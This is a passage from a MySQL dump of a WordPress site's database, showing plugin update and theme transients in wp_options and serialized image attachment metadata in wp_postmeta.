440\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:68:\"https://ps.w.org/wp-mail-smtp/assets/banner-1544x500.jpg?rev=2811094\";s:2:\"1x\";s:67:\"https://ps.w.org/wp-mail-smtp/assets/banner-772x250.jpg?rev=2811094\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.5\";}}s:7:\"checked\";a:11:{s:19:\"akismet/akismet.php\";s:5:\"5.3.2\";s:51:\"all-in-one-wp-migration/all-in-one-wp-migration.php\";s:4:\"7.83\";s:91:\"all-in-one-wp-migration-unlimited-extension/all-in-one-wp-migration-unlimited-extension.php\";s:4:\"2.52\";s:27:\"autoptimize/autoptimize.php\";s:6:\"3.1.11\";s:27:\"comet-cache/comet-cache.php\";s:6:\"170220\";s:23:\"elementor/elementor.php\";s:6:\"3.22.3\";s:39:\"elfsight-popup-cc/elfsight-popup-cc.php\";s:5:\"1.0.0\";s:55:\"elfsight-whatsapp-chat-cc/elfsight-whatsapp-chat-cc.php\";s:5:\"1.1.0\";s:9:\"hello.php\";s:5:\"1.7.2\";s:19:\"jetpack/jetpack.php\";s:4:\"13.5\";s:29:\"wp-mail-smtp/wp_mail_smtp.php\";s:5:\"4.0.1\";}}','no'),(239716,'_site_transient_timeout_theme_roots','1719436740','no'),(239717,'_site_transient_theme_roots','a:4:{s:4:\"Divi\";s:7:\"/themes\";s:16:\"twentytwentyfour\";s:7:\"/themes\";s:17:\"twentytwentythree\";s:7:\"/themes\";s:15:\"twentytwentytwo\";s:7:\"/themes\";}','no');
/*!40000 ALTER TABLE `wp_options` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_postmeta`
--

DROP TABLE IF EXISTS `wp_postmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_postmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `post_id` (`post_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=1005 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_postmeta`
--

LOCK TABLES `wp_postmeta` WRITE;
/*!40000 ALTER TABLE `wp_postmeta` DISABLE KEYS */;
INSERT INTO `wp_postmeta` VALUES (1,2,'_wp_page_template','default'),(13,11,'_wp_attached_file','2020/05/cropped-Artboard.jpg'),(14,11,'_wp_attachment_context','site-icon'),(15,11,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:28:\"2020/05/cropped-Artboard.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"cropped-Artboard-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"cropped-Artboard-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:28:\"cropped-Artboard-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:28:\"cropped-Artboard-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:28:\"cropped-Artboard-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:28:\"cropped-Artboard-400x512.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:28:\"cropped-Artboard-480x480.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"site_icon-270\";a:4:{s:4:\"file\";s:28:\"cropped-Artboard-270x270.jpg\";s:5:\"width\";i:270;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"site_icon-192\";a:4:{s:4:\"file\";s:28:\"cropped-Artboard-192x192.jpg\";s:5:\"width\";i:192;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"site_icon-180\";a:4:{s:4:\"file\";s:28:\"cropped-Artboard-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"site_icon-32\";a:4:{s:4:\"file\";s:26:\"cropped-Artboard-32x32.jpg\";s:5:\"width\";i:32;s:6:\"height\";i:32;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(20,14,'_wp_attached_file','2020/05/cropped-thumbnail.png'),(21,14,'_wp_attachment_context','site-icon'),(22,14,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:29:\"2020/05/cropped-thumbnail.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"cropped-thumbnail-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"cropped-thumbnail-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:29:\"cropped-thumbnail-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:29:\"cropped-thumbnail-400x284.png\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:29:\"cropped-thumbnail-510x382.png\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:29:\"cropped-thumbnail-400x512.png\";s:5:\"width\";i:400;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:29:\"cropped-thumbnail-480x480.png\";s:5:\"width\";i:480;s:6:\"height\";i:480;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-270\";a:4:{s:4:\"file\";s:29:\"cropped-thumbnail-270x270.png\";s:5:\"width\";i:270;s:6:\"height\";i:270;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-192\";a:4:{s:4:\"file\";s:29:\"cropped-thumbnail-192x192.png\";s:5:\"width\";i:192;s:6:\"height\";i:192;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-180\";a:4:{s:4:\"file\";s:29:\"cropped-thumbnail-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"site_icon-32\";a:4:{s:4:\"file\";s:27:\"cropped-thumbnail-32x32.png\";s:5:\"width\";i:32;s:6:\"height\";i:32;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(43,18,'_wp_attached_file','2020/05/geometric-bg-overlay-01.jpg'),(44,18,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:800;s:4:\"file\";s:35:\"2020/05/geometric-bg-overlay-01.jpg\";s:5:\"sizes\";a:14:{s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"geometric-bg-overlay-01-300x125.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"geometric-bg-overlay-01-1024x427.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"geometric-bg-overlay-01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"geometric-bg-overlay-01-768x320.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:36:\"geometric-bg-overlay-01-1536x640.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:35:\"geometric-bg-overlay-01-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:36:\"geometric-bg-overlay-01-1080x675.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:35:\"geometric-bg-overlay-01-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:35:\"geometric-bg-overlay-01-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-image-single\";a:4:{s:4:\"file\";s:36:\"geometric-bg-overlay-01-1080x450.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:35:\"geometric-bg-overlay-01-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"et-pb-image--responsive--desktop\";a:4:{s:4:\"file\";s:36:\"geometric-bg-overlay-01-1280x533.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:533;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-image--responsive--tablet\";a:4:{s:4:\"file\";s:35:\"geometric-bg-overlay-01-980x408.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:408;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:35:\"geometric-bg-overlay-01-480x200.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(47,20,'_wp_attached_file','2020/05/quote-bg.png'),(48,20,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:139;s:6:\"height\";i:114;s:4:\"file\";s:20:\"2020/05/quote-bg.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(53,23,'_wp_attached_file','2020/05/geometric-bg-overlay-02.jpg'),(54,23,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:800;s:4:\"file\";s:35:\"2020/05/geometric-bg-overlay-02.jpg\";s:5:\"sizes\";a:14:{s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"geometric-bg-overlay-02-300x125.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"geometric-bg-overlay-02-1024x427.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"geometric-bg-overlay-02-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"geometric-bg-overlay-02-768x320.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:36:\"geometric-bg-overlay-02-1536x640.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:35:\"geometric-bg-overlay-02-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:36:\"geometric-bg-overlay-02-1080x675.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:35:\"geometric-bg-overlay-02-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:35:\"geometric-bg-overlay-02-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-image-single\";a:4:{s:4:\"file\";s:36:\"geometric-bg-overlay-02-1080x450.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:35:\"geometric-bg-overlay-02-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"et-pb-image--responsive--desktop\";a:4:{s:4:\"file\";s:36:\"geometric-bg-overlay-02-1280x533.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:533;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-image--responsive--tablet\";a:4:{s:4:\"file\";s:35:\"geometric-bg-overlay-02-980x408.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:408;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:35:\"geometric-bg-overlay-02-480x200.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(55,24,'_wp_attached_file','2020/05/sass-ui-mocks-o5.jpg'),(56,24,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:801;s:6:\"height\";i:329;s:4:\"file\";s:28:\"2020/05/sass-ui-mocks-o5.jpg\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"sass-ui-mocks-o5-300x123.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:123;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"sass-ui-mocks-o5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"sass-ui-mocks-o5-768x315.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:315;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:28:\"sass-ui-mocks-o5-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:28:\"sass-ui-mocks-o5-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:28:\"sass-ui-mocks-o5-510x329.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:329;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:28:\"sass-ui-mocks-o5-400x329.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:329;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:28:\"sass-ui-mocks-o5-480x197.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:197;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(68,31,'_wp_attached_file','2020/05/img-5.png'),(69,31,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:448;s:6:\"height\";i:263;s:4:\"file\";s:17:\"2020/05/img-5.png\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"img-5-300x176.png\";s:5:\"width\";i:300;s:6:\"height\";i:176;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"img-5-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:17:\"img-5-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:17:\"img-5-400x263.png\";s:5:\"width\";i:400;s:6:\"height\";i:263;s:9:\"mime-type\";s:9:\"image/png\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:17:\"img-5-400x263.png\";s:5:\"width\";i:400;s:6:\"height\";i:263;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(70,32,'_wp_attached_file','2020/05/img-4-1.png'),(71,32,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:448;s:6:\"height\";i:261;s:4:\"file\";s:19:\"2020/05/img-4-1.png\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"img-4-1-300x175.png\";s:5:\"width\";i:300;s:6:\"height\";i:175;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"img-4-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:19:\"img-4-1-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:19:\"img-4-1-400x261.png\";s:5:\"width\";i:400;s:6:\"height\";i:261;s:9:\"mime-type\";s:9:\"image/png\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:19:\"img-4-1-400x261.png\";s:5:\"width\";i:400;s:6:\"height\";i:261;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(72,33,'_wp_attached_file','2020/05/img-6-1.png'),(73,33,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:448;s:6:\"height\";i:261;s:4:\"file\";s:19:\"2020/05/img-6-1.png\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"img-6-1-300x175.png\";s:5:\"width\";i:300;s:6:\"height\";i:175;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"img-6-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:19:\"img-6-1-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:19:\"img-6-1-400x261.png\";s:5:\"width\";i:400;s:6:\"height\";i:261;s:9:\"mime-type\";s:9:\"image/png\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:19:\"img-6-1-400x261.png\";s:5:\"width\";i:400;s:6:\"height\";i:261;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(74,34,'_wp_attached_file','2020/05/Group-12.png'),(75,34,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:163;s:6:\"height\";i:27;s:4:\"file\";s:20:\"2020/05/Group-12.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"Group-12-150x27.png\";s:5:\"width\";i:150;s:6:\"height\";i:27;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(76,35,'_wp_attached_file','2020/05/Group-1.png'),(77,35,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:90;s:6:\"height\";i:30;s:4:\"file\";s:19:\"2020/05/Group-1.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(78,36,'_wp_attached_file','2020/05/Group-1-corpy.png'),(79,36,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:145;s:6:\"height\";i:30;s:4:\"file\";s:25:\"2020/05/Group-1-corpy.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(80,37,'_wp_attached_file','2020/05/Group-1-copy-2.png'),(81,37,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:192;s:6:\"height\";i:30;s:4:\"file\";s:26:\"2020/05/Group-1-copy-2.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Group-1-copy-2-150x30.png\";s:5:\"width\";i:150;s:6:\"height\";i:30;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(210,95,'_wp_attached_file','2020/06/agency-09.jpg'),(211,95,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1080;s:6:\"height\";i:551;s:4:\"file\";s:21:\"2020/06/agency-09.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"agency-09-300x153.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:153;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"agency-09-1024x522.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:522;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"agency-09-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"agency-09-768x392.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:392;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21: